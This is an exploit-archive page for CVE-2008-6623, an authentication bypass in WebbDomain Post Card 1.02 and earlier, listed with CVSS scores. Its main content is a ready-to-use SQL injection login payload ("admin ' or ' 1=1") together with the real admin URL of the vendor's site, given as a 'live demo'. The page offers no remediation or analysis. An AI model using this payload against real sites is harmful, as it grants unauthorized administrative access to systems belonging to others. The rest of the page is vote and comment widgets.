WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln

2009.04.09

Credit: x0r

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-6623

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

-==============================-
 Autore: x0r - Road Crew 
Cms: WebbDomain Web Postcards
Bug: Auth ByPass 
Site Of Seller: http://webbdomain.com
 -==============================- 
Exploit: http://webbdomain.com/php/postcarden/admin

Username: admin ' or ' 1=1 
Pass: x0r 

Live Demo: http://webbdomain.com/php/postcarden/admin/admin.php
 
Greetz: La Mia Bimb4...8\10\08 Ti AmO 

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.